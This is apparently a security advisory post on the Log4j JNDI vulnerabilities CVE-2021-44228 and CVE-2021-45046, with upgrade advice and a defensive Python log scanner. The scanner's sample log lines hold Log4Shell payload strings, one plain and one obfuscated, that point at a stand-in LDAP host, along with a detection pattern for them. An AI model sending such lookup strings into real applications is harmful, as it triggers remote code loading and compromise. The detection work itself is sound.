The Apache Software Foundation project Apache Logging Services has responded to a security vulnerability that is described in two CVEs, CVE-2021-44228 and CVE-2021-45046. The most recent CVE has been addressed in Apache Log4j 2.16.0, released on 13 December. In this post we’ll list the CVEs affecting Log4j and keep a list of frequently asked questions.

CVE-2021-44228: Apache Log4j2 JNDI features do not protect against attacker controlled LDAP and other JNDI related endpoints

In Apache Log4j2 versions up to and including 2.14.1, the JNDI features used in configurations, log messages, and parameters do not protect against attacker-controlled LDAP and other JNDI related endpoints. An attacker who can control log messages or log message parameters can execute arbitrary code loaded from LDAP servers when message lookup substitution is enabled. See the entire description and history on the Apache Logging security page.

While the 2.15.0 release addressed the most severe vulnerability, the fix in Log4j 2.15.0 was incomplete in some non-default configurations and could allow an attacker to execute a denial of service (DoS) attack. We recommend that users update to 2.16.0 if possible. Users still on Java 7 should upgrade to the Log4j 2.12.2 release.
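Because the vulnerability is triggered by attacker-controlled text reaching a log message, a defender's first detection step is to scan existing logs for JNDI lookup strings. The following is an added example, not code from the original post or from the Log4j project: it normalizes nested lookups roughly the way Log4j's substitutor would (resolving `lower`/`upper` and `:-` default values) so that a `${jndi:` lookup is found even when it is wrapped in other lookups. The sample access-log lines and the `lookup.invalid` host are constructed for this example.

```python
import re

# Constructed sample access-log lines (not from the original post): one benign
# request and two whose User-Agent field carries a Log4j lookup string.
SAMPLE_LOG_LINES = [
    '10.0.0.5 - - [10/Dec/2021:12:00:01 +0000] "GET /index.html HTTP/1.1" 200 "Mozilla/5.0"',
    '10.0.0.7 - - [10/Dec/2021:12:00:02 +0000] "GET /login HTTP/1.1" 200 "${jndi:ldap://lookup.invalid/a}"',
    '10.0.0.9 - - [10/Dec/2021:12:00:03 +0000] "GET /api HTTP/1.1" 500 "${${lower:j}ndi:ldap://lookup.invalid/b}"',
]

# Innermost ${...} lookup: no further '$', '{' or '}' inside the braces.
LOOKUP = re.compile(r"\$\{([^${}]*)\}")
# The lookup we are hunting for, after normalization.
JNDI = re.compile(r"\$\{\s*jndi\s*:", re.IGNORECASE)


def _resolve(inner):
    """Approximate Log4j's handling of one innermost lookup body.

    Only the transformations needed to unwrap nested lookups are modelled;
    anything else (jndi, env, date, ...) is kept verbatim so it can be matched.
    """
    if ":-" in inner:                      # ${name:-default} -> default value
        return inner.split(":-", 1)[1]
    if ":" in inner:
        prefix, value = inner.split(":", 1)
        if prefix.lower() == "lower":
            return value.lower()
        if prefix.lower() == "upper":
            return value.upper()
    return "${" + inner + "}"


def normalize(text, max_rounds=10):
    """Repeatedly resolve innermost lookups until the text stops changing."""
    for _ in range(max_rounds):
        new = LOOKUP.sub(lambda m: _resolve(m.group(1)), text)
        if new == text:
            break
        text = new
    return text


def find_jndi_lookups(lines):
    """Return (line_index, normalized_line) for every line carrying a JNDI lookup."""
    hits = []
    for i, line in enumerate(lines):
        norm = normalize(line)
        if JNDI.search(norm):
            hits.append((i, norm))
    return hits


if __name__ == "__main__":
    for idx, line in find_jndi_lookups(SAMPLE_LOG_LINES):
        print(f"line {idx}: {line}")
```

A hit means the string reached the log; whether it was evaluated depends on the Log4j version and configuration discussed above, so hits are a trigger for the upgrade check, not proof of compromise.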